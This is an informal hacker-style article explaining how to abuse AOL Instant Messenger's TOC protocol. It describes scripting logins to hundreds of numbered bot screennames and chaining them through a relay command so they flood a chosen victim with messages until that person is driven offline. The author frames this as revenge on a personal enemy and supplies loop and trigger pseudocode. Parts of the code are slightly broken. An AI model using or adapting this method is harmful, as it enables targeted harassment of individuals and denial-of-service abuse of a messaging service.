Creating AIM Mayhem

by windwake

Server protocol information is seldom entered by a user manually, and just about always automated by the program that they're using.

The most that we would see this happen is in Internet Relay Chat (IRC), where you are almost encouraged to enter the server protocol in manually.  But how many people have actually messed with, or even seen AOL's Instant Messenger service's command protocol, or MSN, Yahoo! Messenger, or even Jabber?

The information about AOL's AIM service is probably the least abused information released about any messenger service.  The actual released information about the information that is sent to AOL's servers, check out: cvs.sourceforge.net/viewcvs.py/gaim/gaim/doc/Attic/PROTOCOL?rev=1.4

This may not seem useful at first glance, as no one would really take the time to enter any of this manually.

Now, for a programmer, after a second or two, they inevitably comprehend the true potential that information such as this gives them; abusing AOL's service, allowing them to gain information about other users, force them to sign off, or even gain more sensitive information from AOL because they know the lingo.

Think about this from a programming perspective.

I have written a program in PHP (yes, the server based parsing language), that logs in and talks to me when I sign on and talk to it, repeating everything I say, followed by my screenname.  It isn't hard to write a program, in any language (C/++, PHP, Perl, even VB) that will allow you to sign onto AIM with a screenname, using the protocol by just sending information to their server (in PHP, I used fsockopen() to connect, and fwrite() to send information through the connection; much more easy than you would expect).

Now that you have a program/script that will log onto AOL's servers, you know that one screenname won't allow you to wreak utter havoc on the jock that dunked your head in a toilet in high school.

Solution: create more, but follow their names with numbers, each time you create one, adding a number.  For instance, thepwnz0r1, thepwnz0r2, ... thepwnz0r276.

After spending much time creating many screennames, you probably know what you have to do; loop through them.

Take the script you wrote to connect to AIM, yet instead of entering the values manually, enter thepwnz0r followed by a variable, the variable being the amount of times the script has looped.

This would look something like this:

for (i = 1; i <= 276; i++) { // connect putting the value of i after "thepwnz0r", // logging into "thepwnz0r1" all the way through "thepwnz0r276". }

You now have a script that will log into 276 screennames.

Of course, now, you could enter code manually, writing in the script to spam j0cK4lIfE46234424235 with random messages each time each screenname signs on, virtually disabling him from doing anything.

One problem; you don't want to have to change the code each time, and recompile/reupload it.

I don't blame you, this all gets annoying after a while, and the attack isn't as graceful.

Solution: write code allowing you to tell thepwnz0r1 a simple line of text, such as spam j0cK4lIfE46234424235 which would trigger an if statement, such as:

if (substr(message, 0, 3) == "spam") { message = explode(message, " "); sendmessage("thepwnz0r", i + 1, message[0].message[1]); spam(message[1]); }

spam() would be a function that sends messages to the value given to it, and sendmessage() would send a message to the next screenname, continuing the circle.

You would be able to spam someone simply by opening the executable/script and AIM, then sending an instant message to thepwnz0r1 saying: spam [screenname]

There is almost no defense to a script like this, except for the victim getting off of AIM, which they would inevitably have to do.

The potential of this TOC protocol is amazing; the amount of not only AIM abuse, but new functionality and ease of use in third-party programs that can come from this is astonishing.

Plus, there's nothing that AOL can do about it.